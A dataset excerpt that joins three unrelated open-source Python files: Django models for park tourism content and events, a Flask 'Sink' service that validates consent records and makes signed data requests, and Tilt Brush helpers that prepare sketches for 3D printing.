street = models.CharField(verbose_name=_(u"Street"), max_length=256,
blank=True, null=True, db_column='rue')
postal_code = models.CharField(verbose_name=_(u"Postal code"), max_length=8,
blank=True, null=True, db_column='code')
municipality = models.CharField(verbose_name=_(u"Municipality"),
blank=True, null=True,
max_length=256, db_column='commune')
geom = models.PointField(verbose_name=_(u"Emplacement"), db_column='geom',
blank=True, null=True,
srid=settings.SRID, spatial_index=False)
objects = models.GeoManager()
class Meta:
db_table = 't_b_renseignement'
verbose_name = _(u"Information desk")
verbose_name_plural = _(u"Information desks")
ordering = ['name']
def __unicode__(self):
return self.name
@property
def description_strip(self):
"""Used in trek public template.
"""
nobr = re.compile(r'(\s*<br.*?>)+\s*', re.I)
newlines = nobr.sub("\n", self.description)
return smart_plain_text(newlines)
@property
def serializable_type(self):
return {
'id': self.type.id,
'label': self.type.label,
'pictogram': self.type.pictogram.url,
}
@property
def latitude(self):
if self.geom:
api_geom = self.geom.transform(settings.API_SRID, clone=True)
return api_geom.y
return None
@property
def longitude(self):
if self.geom:
api_geom = self.geom.transform(settings.API_SRID, clone=True)
return api_geom.x
return None
@property
def thumbnail(self):
if not self.photo:
return None
thumbnailer = get_thumbnailer(self.photo)
try:
return thumbnailer.get_thumbnail(aliases.get('thumbnail'))
except InvalidImageFormatError:
logger.warning(_("Image %s invalid or missing from disk.") % self.photo)
return None
@property
def photo_url(self):
thumbnail = self.thumbnail
if not thumbnail:
return None
return os.path.join(settings.MEDIA_URL, thumbnail.name)
GEOMETRY_TYPES = Choices(
('POINT', 'point', _('Point')),
('LINE', 'line', _('Line')),
('POLYGON', 'polygon', _('Polygon')),
('ANY', 'any', _('Any')),
)
class TouristicContentCategory(PictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom')
geometry_type = models.CharField(db_column="type_geometrie", max_length=16,
choices=GEOMETRY_TYPES, default=GEOMETRY_TYPES.POINT)
type1_label = models.CharField(verbose_name=_(u"First list label"), max_length=128,
db_column='label_type1', blank=True)
type2_label = models.CharField(verbose_name=_(u"Second list label"), max_length=128,
db_column='label_type2', blank=True)
order = models.IntegerField(verbose_name=_(u"Order"), null=True, blank=True, db_column='tri',
help_text=_(u"Alphabetical order if blank"))
id_prefix = 'C'
class Meta:
db_table = 't_b_contenu_touristique_categorie'
verbose_name = _(u"Touristic content category")
verbose_name_plural = _(u"Touristic content categories")
ordering = ['order', 'label']
def __unicode__(self):
return self.label
@property
def prefixed_id(self):
return '{prefix}{id}'.format(prefix=self.id_prefix, id=self.id)
class TouristicContentType(OptionalPictogramMixin):
label = models.CharField(verbose_name=_(u"Label"), max_length=128, db_column='nom')
category = models.ForeignKey(TouristicContentCategory, related_name='types',
verbose_name=_(u"Category"), db_column='categorie')
# Choose in which list of choices this type will appear
in_list = models.IntegerField(choices=((1, _(u"First")), (2, _(u"Second"))), db_column='liste_choix')
class Meta:
db_table = 't_b_contenu_touristique_type'
verbose_name = _(u"Touristic content type")
verbose_name_plural = _(u"Touristic content type")
ordering = ['label']
def __unicode__(self):
return self.label
class TouristicContentType1Manager(MultilingualManager):
def get_queryset(self):
return super(TouristicContentType1Manager, self).get_queryset().filter(in_list=1)
class TouristicContentType2Manager(MultilingualManager):
def get_queryset(self):
return super(TouristicContentType2Manager, self).get_queryset().filter(in_list=2)
class TouristicContentType1(TouristicContentType):
objects = TouristicContentType1Manager()
def __init__(self, *args, **kwargs):
self._meta.get_field('in_list').default = 1
super(TouristicContentType1, self).__init__(*args, **kwargs)
class Meta:
proxy = True
verbose_name = _(u"Type")
verbose_name_plural = _(u"First list types")
class TouristicContentType2(TouristicContentType):
objects = TouristicContentType2Manager()
def __init__(self, *args, **kwargs):
self._meta.get_field('in_list').default = 2
super(TouristicContentType2, self).__init__(*args, **kwargs)
class Meta:
proxy = True
verbose_name = _(u"Type")
verbose_name_plural = _(u"Second list types")
class ReservationSystem(models.Model):
name = models.CharField(verbose_name=_(u"Name"), max_length=256,
blank=False, null=False, unique=True)
def __unicode__(self):
return self.name
class Meta:
db_table = 't_b_systeme_reservation'
verbose_name = _(u"Reservation system")
verbose_name_plural = _(u"Reservation systems")
class TouristicContent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated,
TimeStampedModelMixin, PicturesMixin, NoDeleteMixin):
""" A generic touristic content (accomodation, museum, etc.) in the park
"""
description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True,
help_text=_(u"A brief summary"), db_column='chapeau')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Complete description"))
themes = models.ManyToManyField(Theme, related_name="touristiccontents",
db_table="t_r_contenu_touristique_theme", blank=True, verbose_name=_(u"Themes"),
help_text=_(u"Main theme(s)"))
geom = models.GeometryField(verbose_name=_(u"Location"), srid=settings.SRID)
category = models.ForeignKey(TouristicContentCategory, related_name='contents',
verbose_name=_(u"Category"), db_column='categorie')
contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact',
help_text=_(u"Address, phone, etc."))
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques',
help_text=_(u"Anything worth to know"))
type1 = models.ManyToManyField(TouristicContentType, related_name='contents1',
verbose_name=_(u"Type 1"), db_table="t_r_contenu_touristique_type1",
blank=True)
type2 = models.ManyToManyField(TouristicContentType, related_name='contents2',
verbose_name=_(u"Type 2"), db_table="t_r_contenu_touristique_type2",
blank=True)
source = models.ManyToManyField('common.RecordSource',
blank=True, related_name='touristiccontents',
verbose_name=_("Source"), db_table='t_r_contenu_touristique_source')
portal = models.ManyToManyField('common.TargetPortal',
blank=True, related_name='touristiccontents',
verbose_name=_("Portal"), db_table='t_r_contenu_touristique_portal')
eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe')
reservation_system = models.ForeignKey(ReservationSystem, verbose_name=_(u"Reservation system"),
blank=True, null=True)
reservation_id = models.CharField(verbose_name=_(u"Reservation ID"), max_length=1024,
blank=True, db_column='id_reservation')
approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise')
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
class Meta:
db_table = 't_t_contenu_touristique'
verbose_name = _(u"Touristic content")
verbose_name_plural = _(u"Touristic contents")
def __unicode__(self):
return self.name
@property
def districts_display(self):
return ', '.join([unicode(d) for d in self.districts])
@property
def type1_label(self):
return self.category.type1_label
@property
def type2_label(self):
return self.category.type2_label
@property
def type1_display(self):
return ', '.join([unicode(n) for n in self.type1.all()])
@property
def type2_display(self):
return ', '.join([unicode(n) for n in self.type2.all()])
@property
def prefixed_category_id(self):
return self.category.prefixed_id
def distance(self, to_cls):
return settings.TOURISM_INTERSECTION_MARGIN
@property
def type(self):
"""Fake type to simulate POI for mobile app v1"""
return self.category
@property
def min_elevation(self):
return 0
@property
def max_elevation(self):
return 0
@property
def portal_display(self):
return ', '.join([unicode(portal) for portal in self.portal.all()])
@property
def source_display(self):
return ','.join([unicode(source) for source in self.source.all()])
@property
def themes_display(self):
return ','.join([unicode(source) for source in self.themes.all()])
@property
def extent(self):
return self.geom.buffer(10).transform(settings.API_SRID, clone=True).extent
@property
def rando_url(self):
category_slug = _(u'touristic-content')
return '{}/{}/'.format(category_slug, self.slug)
@property
def meta_description(self):
return plain_text(self.description_teaser or self.description)[:500]
Topology.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
Topology.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
TouristicContent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
TouristicContent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
class TouristicEventType(OptionalPictogramMixin):
type = models.CharField(verbose_name=_(u"Type"), max_length=128, db_column='type')
class Meta:
db_table = 't_b_evenement_touristique_type'
verbose_name = _(u"Touristic event type")
verbose_name_plural = _(u"Touristic event types")
ordering = ['type']
def __unicode__(self):
return self.type
class TouristicEvent(AddPropertyMixin, PublishableMixin, MapEntityMixin, StructureRelated,
PicturesMixin, TimeStampedModelMixin, NoDeleteMixin):
""" A touristic event (conference, workshop, etc.) in the park
"""
description_teaser = models.TextField(verbose_name=_(u"Description teaser"), blank=True,
help_text=_(u"A brief summary"), db_column='chapeau')
description = models.TextField(verbose_name=_(u"Description"), blank=True, db_column='description',
help_text=_(u"Complete description"))
themes = models.ManyToManyField(Theme, related_name="touristic_events",
db_table="t_r_evenement_touristique_theme", blank=True, verbose_name=_(u"Themes"),
help_text=_(u"Main theme(s)"))
geom = models.PointField(verbose_name=_(u"Location"), srid=settings.SRID)
begin_date = models.DateField(blank=True, null=True, verbose_name=_(u"Begin date"), db_column='date_debut')
end_date = models.DateField(blank=True, null=True, verbose_name=_(u"End date"), db_column='date_fin')
duration = models.CharField(verbose_name=_(u"Duration"), max_length=64, blank=True, db_column='duree',
help_text=_(u"3 days, season, ..."))
meeting_point = models.CharField(verbose_name=_(u"Meeting point"), max_length=256, blank=True, db_column='point_rdv',
help_text=_(u"Where exactly ?"))
meeting_time = models.TimeField(verbose_name=_(u"Meeting time"), blank=True, null=True, db_column='heure_rdv',
help_text=_(u"11:00, 23:30"))
contact = models.TextField(verbose_name=_(u"Contact"), blank=True, db_column='contact')
email = models.EmailField(verbose_name=_(u"Email"), max_length=256, db_column='email',
blank=True, null=True)
website = models.URLField(verbose_name=_(u"Website"), max_length=256, db_column='website',
blank=True, null=True)
organizer = models.CharField(verbose_name=_(u"Organizer"), max_length=256, blank=True, db_column='organisateur')
speaker = models.CharField(verbose_name=_(u"Speaker"), max_length=256, blank=True, db_column='intervenant')
type = models.ForeignKey(TouristicEventType, verbose_name=_(u"Type"), blank=True, null=True, db_column='type')
accessibility = models.CharField(verbose_name=_(u"Accessibility"), max_length=256, blank=True, db_column='accessibilite')
participant_number = models.CharField(verbose_name=_(u"Number of participants"), max_length=256, blank=True, db_column='nb_places')
booking = models.TextField(verbose_name=_(u"Booking"), blank=True, db_column='reservation')
target_audience = models.CharField(verbose_name=_(u"Target audience"), max_length=128, blank=True, null=True, db_column='public_vise')
practical_info = models.TextField(verbose_name=_(u"Practical info"), blank=True, db_column='infos_pratiques',
help_text=_(u"Recommandations / To plan / Advices"))
source = models.ManyToManyField('common.RecordSource',
blank=True, related_name='touristicevents',
verbose_name=_("Source"), db_table='t_r_evenement_touristique_source')
portal = models.ManyToManyField('common.TargetPortal',
blank=True, related_name='touristicevents',
verbose_name=_("Portal"), db_table='t_r_evenement_touristique_portal')
eid = models.CharField(verbose_name=_(u"External id"), max_length=1024, blank=True, null=True, db_column='id_externe')
approved = models.BooleanField(verbose_name=_(u"Approved"), default=False, db_column='labellise')
objects = NoDeleteMixin.get_manager_cls(models.GeoManager)()
category_id_prefix = 'E'
class Meta:
db_table = 't_t_evenement_touristique'
verbose_name = _(u"Touristic event")
verbose_name_plural = _(u"Touristic events")
ordering = ['-begin_date']
def __unicode__(self):
return self.name
@property
def type1(self):
return [self.type] if self.type else []
@property
def type2(self):
return []
@property
def districts_display(self):
return ', '.join([unicode(d) for d in self.districts])
@property
def dates_display(self):
if not self.begin_date and not self.end_date:
return u""
elif not self.end_date:
return _(u"starting from {begin}").format(
begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT'))
elif not self.begin_date:
return _(u"up to {end}").format(
end=date_format(self.end_date, 'SHORT_DATE_FORMAT'))
elif self.begin_date == self.end_date:
return date_format(self.begin_date, 'SHORT_DATE_FORMAT')
else:
return _(u"from {begin} to {end}").format(
begin=date_format(self.begin_date, 'SHORT_DATE_FORMAT'),
end=date_format(self.end_date, 'SHORT_DATE_FORMAT'))
@property
def prefixed_category_id(self):
return self.category_id_prefix
def distance(self, to_cls):
return settings.TOURISM_INTERSECTION_MARGIN
@property
def portal_display(self):
return ', '.join([unicode(portal) for portal in self.portal.all()])
@property
def source_display(self):
return ', '.join([unicode(source) for source in self.source.all()])
@property
def themes_display(self):
return ','.join([unicode(source) for source in self.themes.all()])
@property
def rando_url(self):
category_slug = _(u'touristic-event')
return '{}/{}/'.format(category_slug, self.slug)
@property
def meta_description(self):
return plain_text(self.description_teaser or self.description)[:500]
TouristicEvent.add_property('touristic_contents', lambda self: intersecting(TouristicContent, self), _(u"Touristic contents"))
TouristicEvent.add_property('published_touristic_contents', lambda self: intersecting(TouristicContent, self).filter(published=True), _(u"Published touristic contents"))
Topology.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
Topology.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
TouristicContent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
TouristicContent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
TouristicEvent.add_property('touristic_events', lambda self: intersecting(TouristicEvent, self), _(u"Touristic events"))
TouristicEvent.add_property('published_touristic_events', lambda self: intersecting(TouristicEvent, self).filter(published=True), _(u"Published touristic events"))
| 1.820313 | 2 |
Service_Components/Sink/Sink_DataFlow.py | mydata-sdk/mydata-sdk-1.x | 0 | 11081 | <filename>Service_Components/Sink/Sink_DataFlow.py
# -*- coding: utf-8 -*-
from signed_requests.signed_request_auth import SignedRequest
__author__ = 'alpaloma'
from flask import Blueprint, current_app, request
from helpers import Helpers
import requests
from json import dumps, loads
from DetailedHTTPException import error_handler
from flask_restful import Resource, Api
import logging
from jwcrypto import jwk
from Templates import Sequences
debug_log = logging.getLogger("debug")
logger = logging.getLogger("sequence")
api_Sink_blueprint = Blueprint("api_Sink_blueprint", __name__)
api = Api()
api.init_app(api_Sink_blueprint)
sq = Sequences("Service_Components Mgmnt (Sink)", {})
# import xmltodict
# @api.representation('application/xml')
# def output_xml(data, code, headers=None):
# if isinstance(data, dict):
# xm = {"response": data}
# resp = make_response(xmltodict.unparse(xm, pretty=True), code)
# resp.headers.extend(headers)
# return resp
class Status(Resource):
@error_handler
def get(self):
status = {"status": "running", "service_mode": "Sink"}
return status
class DataFlow(Resource):
def __init__(self):
super(DataFlow, self).__init__()
self.service_url = current_app.config["SERVICE_URL"]
self.operator_url = current_app.config["OPERATOR_URL"]
self.helpers = Helpers(current_app.config)
@error_handler
def post(self): # TODO Make this a GET
def renew_token(operator_url, record_id):
sq.task("Renewing Auth Token.")
token = requests.get(
"{}/api/1.2/cr/auth_token/{}".format(operator_url, record_id)) # TODO Get api path from some config?
debug_log.info("{}, {}, {}, {}".format(token.url, token.reason, token.status_code, token.text))
store_dict = {cr_id: dumps(loads(token.text.encode()))}
self.helpers.storeToken(store_dict)
def step_1():
params = request.json
debug_log.info(params)
debug_log.info(request.json)
user_id = params["user_id"]
cr_id = params["cr_id"]
rs_id = params["rs_id"]
sq.task("Get data_set_id from POST json")
data_set_id = request.args.get("dataset_id", None)
debug_log.info("data_set_id is ({}), cr_id is ({}), user_id ({}) and rs_id ({})"
.format(data_set_id, cr_id, user_id, rs_id))
sq.task("Create request")
req = {"we want": "data"}
sq.task("Validate CR")
cr = self.helpers.validate_cr(cr_id, surrogate_id=user_id)
sq.task("Validate Request from UI")
distribution_urls = self.helpers.validate_request_from_ui(cr, data_set_id, rs_id)
# Fetch data request urls
# Data request urls fetched.
debug_log.info("Data request urls fetched.")
return cr_id, cr, distribution_urls
cr_id, cr, distribution_urls = step_1()
sq.task("Validate Authorisation Token")
surrogate_id = cr["cr"]["common_part"]["surrogate_id"]
our_key = self.helpers.get_key()
our_key_pub = our_key["pub"]
tries = 3 # TODO: Get this from config
while True:
try:
aud = self.helpers.validate_authorization_token(cr_id, surrogate_id, our_key_pub)
break
except ValueError as e:
debug_log.exception(e)
renew_token(self.operator_url, cr_id)
if tries == 0:
raise EnvironmentError("Auth token validation failed and retry counter exceeded.")
tries -= 1
except TypeError as e:
debug_log.exception(e)
raise EnvironmentError("Token used too soon, halting.")
# Most verifying and checking below is done in the validate_authorization_token function by jwcrypto
# Fetch Authorisation Token related to CR from data storage by rs_id (cr_id?)
# Check Integrity ( Signed by operator, Operator's public key can be found from SLR)
# Check "Issued" timestamp
# Check "Not Before" timestamp
# Check "Not After" timestamp
# Check that "sub" contains correct public key(Our key.)
# OPT: Token expired
# Get new Authorization token, start again from validation. # TODO: Make these steps work as functions that call the next step.
# Check URL patterns in "aud" field
# Check that fetched distribution urls can be found from "aud" field
# Token validated
debug_log.info("Auth Token Validated.")
# With these two steps Sink has verified that it's allowed to make request.
# Construct request
sq.task("Construct request")
# Select request URL from "aud" field
# Add Authorisation Token to request
# Request constructed.
# Sign request
# Fetch private key pair of public key specified in Authorisation Token's "sub" field.
# Sign with fetched private key
sq.task("Fetch key used to sign request")
our_key_full = jwk.JWK()
our_key_full.import_key(**our_key["key"])
# Add signature to request
# Request signed.
# Request created.
sq.send_to("Service_Components Mgmnt (Source)", "Data Request (PoP stuff)")
# Make Data Request
for url in distribution_urls:
req = requests.get(url,
auth=SignedRequest(token=aud, sign_method=True, sign_path=True, key=our_key_full, protected=dumps(our_key["prot"])))
debug_log.info("Made data request and received following data from Source: \n{}"
.format(dumps(loads(req.content), indent=2)))
status = {"status": "ok", "service_mode": "Sink"}
return status
api.add_resource(Status, '/init')
api.add_resource(DataFlow, '/dc')
#api.add_resource(DataFlow, '/user/<string:user_id>/consentRecord/<string:cr_id>/resourceSet/<string:rs_id>')
#"http://service_components:7000/api/1.2/sink_flow/user/95479a08-80cc-4359-ba28-b8ca23ff5572_53af88dc-33de-44be-bc30-e0826db9bd6c/consentRecord/cd431509-777a-4285-8211-95c5ac577537/resourceSet/http%3A%2F%2Fservice_components%3A7000%7C%7C9aebb487-0c83-4139-b12c-d7fcea93a3ad" | 2.140625 | 2 |
Support/Python/tbdata/printing.py | twitchplayskh/open-brush | 0 | 11082 | # Copyright 2020 The Tilt Brush Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helpers for 3d printing."""
import os
import re
import sys
import math
import pprint
import shutil
import itertools
import subprocess
from collections import Counter
import numpy
try:
from tiltbrush.tilt import Tilt
except ImportError:
print("You need the Tilt Brush Toolkit (https://github.com/googlevr/tilt-brush-toolkit)")
print("and then put its Python directory in your PYTHONPATH.")
sys.exit(1)
from tbdata.brush_lookup import BrushLookup
# Convert strokes for 3d printing.
# True Don't touch these strokes
# False Remove these strokes from the sketch
# <name> Replace the brush for these strokes
# names can also be guids, which is useful when the name is ambiguous
BRUSH_REPLACEMENTS = [
# Good brushes
('SquarePaper', True),
('ThickGeometry', True),
('Wire', True),
# Brushes that should be replaced
('TaperedMarker', 'ThickGeometry'),
('OilPaint', 'ThickGeometry'),
('Ink', 'ThickGeometry'),
('Marker', 'ThickGeometry'),
('Paper', 'ThickGeometry'),
('FlatDeprecated','ThickGeometry'),
# Questionable
('Highlighter', 'ThickGeometry'),
('Light', 'Wire'),
# Remove particles
('Smoke', None),
('Snow', None),
('Embers', None),
('Stars', None),
# Remove animated
('Fire', None),
# Remove shader-based
('Plasma', None),
('Rainbow', None),
('Streamers', None),
]
# ----------------------------------------------------------------------
# Little utilities
# ----------------------------------------------------------------------
def msg(text):
sys.stdout.write("%-79s\r" % text[:79])
sys.stdout.flush()
def msgln(text):
sys.stdout.write("%-79s\n" % text[:79])
sys.stdout.flush()
def rgb8_to_hsl(rgb):
"""Takes a rgb8 tuple, returns a hsl tuple."""
HUE_MAX = 6
r = rgb[0] / 255.0
g = rgb[1] / 255.0
b = rgb[2] / 255.0
cmin = min(r, g, b)
cmax = max(r, g, b)
delta = cmax - cmin
h = 0
s = 0
l = (cmax + cmin)
if delta != 0:
if l < 0.5:
s = delta / l
else:
s = delta / (2 - l)
if r == cmax:
h = (g - b) / delta
elif g == cmax:
h = 2 + (b - r) / delta
elif b == cmax:
h = 4 + (r - g) / delta
return h, s, l
# ----------------------------------------------------------------------
# Brush conversion
# ----------------------------------------------------------------------
def get_replacements_by_guid(replacements_by_name):
"""Returns a lookup table that is by-guid rather than by-name."""
brush_lookup = BrushLookup.get()
def guid_or_name_to_guid(guid_or_name):
if guid_or_name in brush_lookup.guid_to_name:
return guid_or_name
elif guid_or_name in brush_lookup.name_to_guids:
return brush_lookup.get_unique_guid(guid_or_name)
else:
raise LookupError("Not a known brush or brush guid: %r" % guid_or_name)
dct = {}
for before, after in replacements_by_name:
before_guid = guid_or_name_to_guid(before)
if after is True:
after_guid = before_guid
elif after is None:
after_guid = None
else:
after_guid = guid_or_name_to_guid(after)
dct[before_guid] = after_guid
return dct
def convert_brushes(tilt, replacements_by_name, show_removed=False):
"""Convert brushes to 3d-printable versions, or remove their strokes from the tilt."""
replacements = get_replacements_by_guid(replacements_by_name)
brush_lookup = BrushLookup.get()
with tilt.mutable_metadata() as dct:
index_to_guid = dct['BrushIndex']
# First, show us what brushes the tilt file uses
used_guids = Counter()
for stroke in tilt.sketch.strokes:
guid = index_to_guid[stroke.brush_idx]
used_guids[guid] += 1
print("Brushes used:")
for guid, n in sorted(list(used_guids.items()), key=lambda p:-p[1]):
print(" %5d %s" % (n, brush_lookup.guid_to_name.get(guid)))
sys.stdout.flush()
del used_guids
index_to_new_index = {}
for i, guid in enumerate(index_to_guid):
name = brush_lookup.guid_to_name.get(guid, guid)
try:
new_guid = replacements[guid]
except KeyError:
print("%d: Don't know what to do with brush %s" % (i, name))
index_to_new_index[i] = i
else:
new_name = brush_lookup.guid_to_name.get(new_guid, new_guid)
if new_guid is None:
print("%d: Remove %s" % (i, name))
index_to_new_index[i] = None
else:
if guid == new_guid:
print("%d: Keep %s" % (i, name))
elif name == new_name:
print("%d: Replace %s/%s -> %s/%s" % (i, name, guid, new_name, new_guid))
else:
print("%d: Replace %s -> %s" % (i, name, new_name))
try:
new_idx = index_to_guid.index(new_guid)
except ValueError:
new_idx = len(index_to_guid)
index_to_guid.append(new_guid)
index_to_new_index[i] = new_idx
brush_indices_to_remove = set(i for (i, new_i) in list(index_to_new_index.items()) if new_i is None)
if brush_indices_to_remove:
old_len = len(tilt.sketch.strokes)
if show_removed:
# Render in magenta instead of removing
for stroke in tilt.sketch.strokes:
if stroke.brush_idx in brush_indices_to_remove:
stroke.brush_color = (1, 0, 1, 1)
else:
stroke.brush_color = stroke.brush_color
else:
tilt.sketch.strokes[:] = [s for s in tilt.sketch.strokes if s.brush_idx not in brush_indices_to_remove]
new_len = len(tilt.sketch.strokes)
print("Strokes %d -> %d" % (old_len, new_len))
for stroke in tilt.sketch.strokes:
new_idx = index_to_new_index[stroke.brush_idx]
# Might be none if it's a removed brush
if new_idx is not None:
stroke.brush_idx = new_idx
# ----------------------------------------------------------------------
# Stroke simplification
# ----------------------------------------------------------------------
def calculate_pos_error(cp0, cp1, middle_cps):
if len(middle_cps) == 0:
return 0
strip_length = cp1._dist - cp0._dist
if strip_length <= 0:
return 0
max_pos_error = 0
for i, cp in enumerate(middle_cps):
t = (cp._dist - cp0._dist) / strip_length
pos_interpolated = t * cp0._pos + (1-t) * cp1._pos
pos_error = numpy.linalg.norm((pos_interpolated - cp._pos))
if pos_error > max_pos_error:
max_pos_error = pos_error
return max_pos_error
def simplify_stroke(stroke, max_error):
# Do greedy optimization of stroke.
REQUIRED_END_CPS = 1 # or 2
keep_cps = []
toss_cps = [] # The current set of candidates to toss
n = len(stroke.controlpoints)
brush_size = stroke.brush_size
for i, cp in enumerate(stroke.controlpoints):
cp._pos = numpy.array(cp.position)
if i == 0:
cp._dist = 0
else:
prev_cp = stroke.controlpoints[i-1]
cp._dist = prev_cp._dist + numpy.linalg.norm(prev_cp._pos - cp._pos)
if REQUIRED_END_CPS <= i < n - REQUIRED_END_CPS:
pos_error = calculate_pos_error(keep_cps[-1], cp, toss_cps)
keep = (pos_error > max_error * stroke.brush_size)
#print " %3d: %s %f %f" % (i, keep, pos_error, stroke.brush_size * .2)
else:
keep = True
#print " %3d: True (End)" % i
if keep:
keep_cps.append(cp)
toss_cps = []
else:
toss_cps.append(cp)
stroke.controlpoints[:] = keep_cps
def reduce_control_points(tilt, max_error):
# If debug_simplify, the resulting .tilt file shows both the old and the new
before_cp = 0
after_cp = 0
msg("Simplify strokes")
pct = 0
n = len(tilt.sketch.strokes)
for i, stroke in enumerate(tilt.sketch.strokes):
new_pct = (i+1) * 100 / n
if new_pct != pct:
pct = new_pct
removed_pct = (before_cp - after_cp) * 100 / (before_cp+1)
msg("Simplify strokes: %3d%% %5d/%5d Removed %3d%%" % (pct, i, n, removed_pct))
before_cp += len(stroke.controlpoints)
simplify_stroke(stroke, max_error)
after_cp += len(stroke.controlpoints)
msg("Simplify strokes: done")
msgln("Control points: %5d -> %5d (%2d%%)" % (
before_cp, after_cp, after_cp * 100 / before_cp))
# ----------------------------------------------------------------------
# Stray strokes
# ----------------------------------------------------------------------
def remove_stray_strokes(tilt, max_dist=0, replacement_brush_guid=None):
"""Show histograms of control point positions, to help with resizing."""
import numpy as np
from math import sqrt
def iter_pos(tilt):
first_cp = 0
for stroke in tilt.sketch.strokes:
stroke._first_cp = first_cp
first_cp += len(stroke.controlpoints)
for cp in stroke.controlpoints:
yield cp.position
positions = np.array(list(iter_pos(tilt)))
if False:
# Print out x/y/z histograms
histograms = [np.histogram(positions[... , i], bins=30) for i in range(3)]
for irow in range(len(histograms[0][0])+1):
for axis, histogram in enumerate(histograms):
try:
print("%s %3d %6d " % ('xyz'[axis], histogram[1][irow], histogram[0][irow]), end=' ')
except IndexError:
print("%s %3d %6s " % ('xyz'[axis], histogram[1][irow], ''), end=' ')
print()
if max_dist > 0:
# Convert replacement guid -> replacement index
if replacement_brush_guid is None:
replacement_brush_index = None
else:
with tilt.mutable_metadata() as dct:
try:
replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid)
except ValueError:
dct['BrushIndex'].append(replacement_brush_guid)
replacement_brush_index = dct['BrushIndex'].index(replacement_brush_guid)
# Compute Mahalanobis distance and remove strokes that fall outside
# https://en.wikipedia.org/wiki/Mahalanobis_distance
mean = np.mean(positions, axis=0)
cov = np.cov(positions, rowvar=False)
invcov = np.linalg.inv(cov)
def mahalanobis_distance(v):
"""Return distance of row vector"""
cv = (v - mean)[np.newaxis]
return sqrt(cv.dot(invcov).dot(cv.T)[0, 0])
def out_of_bounds(stroke):
i0 = stroke._first_cp
i1 = i0 + len(stroke.controlpoints)
dists = np.array(list(map(mahalanobis_distance, positions[i0 : i1])))
return np.any(dists > max_dist)
msg("Finding OOB strokes")
# TODO: figure out how to use np.einsum() and remove all the python-level loops
oob_strokes = [
pair for pair in enumerate(tilt.sketch.strokes)
if out_of_bounds(pair[1])
]
msg("")
if len(oob_strokes):
if replacement_brush_index is not None:
for i, stroke in oob_strokes:
print("Replacing out-of-bounds stroke", i)
stroke.brush_idx = replacement_brush_index
stroke.brush_color = (1,0,1,1)
else:
print("Removing %d strokes" % len(oob_strokes))
remove_indices = set(pair[0] for pair in oob_strokes)
tilt.sketch.strokes[:] = [
stroke for i, stroke in enumerate(tilt.sketch.stroke)
if i not in remove_indices
]
# ----------------------------------------------------------------------
# Color reduction
# ----------------------------------------------------------------------
def get_most_similar_factors(n):
"""Factorize n into two numbers.
Returns the best pair, in the sense that the numbers are the closest to each other."""
i = int(n**0.5 + 0.5)
while n % i != 0:
i -= 1
return i, n/i
def get_good_factors(n, max_aspect_ratio=None):
"""Factorize n into two integers that are closest to each other.
If max_aspect_ratio is passed, search numbers >= n until
a pair is found whose aspect ratio is <= max_aspect_ratio."""
if max_aspect_ratio is None:
return get_most_similar_factors(n)
for i in itertools.count():
a, b = get_most_similar_factors(n + i)
if float(b)/a <= max_aspect_ratio:
return a, b
def rgbaf_to_rgb8(rgbaf):
"""Convert [r, g, b, a] floats to (r, g, b) bytes."""
return tuple(int(channel * 255) for channel in rgbaf[0:3])
def rgb8_to_rgbaf(rgb8):
"""Convert (r, g, b) bytes to [r, g, b, a] floats."""
lst = [channel / 255.0 for channel in rgb8]
lst.append(1.0)
return lst
def tilt_colors_to_image(tilt, max_aspect_ratio=None, preserve_colors=()):
"""Returns a PIL.Image containing the colors used in the tilt.
The image will have colors in roughly the same proportion as the
control points in the tilt.
preserve_colors is a list of rgb8 colors."""
import numpy as np
from PIL import Image
assert max_aspect_ratio is None or max_aspect_ratio > 0
preserve_colors = set(preserve_colors)
def iter_rgb8_colors(tilt):
for stroke in tilt.sketch.strokes:
yield (rgbaf_to_rgb8(stroke.brush_color), len(stroke.controlpoints))
def by_decreasing_usage(counter_pair):
# Sort function for colors
return -counter_pair[1]
def by_color_similarity(counter_pair):
# Sort function for colors
rgb8, usage = counter_pair
h, s, l = rgb8_to_hsl(rgb8)
return (rgb8 in preserve_colors), l
counter = Counter()
for color, n in iter_rgb8_colors(tilt):
counter[color] += n
most_used_color, amt = max(iter(counter.items()), key=lambda pair: pair[1])
for rgb8 in preserve_colors:
if rgb8 not in counter:
print("Ignoring: #%02x%02x%02x is not in the image" % rgb8)
else:
counter[rgb8] += amt / 2
# Find a "nice" width and height, possibly adjusting the number of texels
num_texels = sum(counter.values())
width, height = get_good_factors(num_texels, max_aspect_ratio)
if width * height != num_texels:
counter[most_used_color] += width * height - num_texels
assert counter[most_used_color] > 0
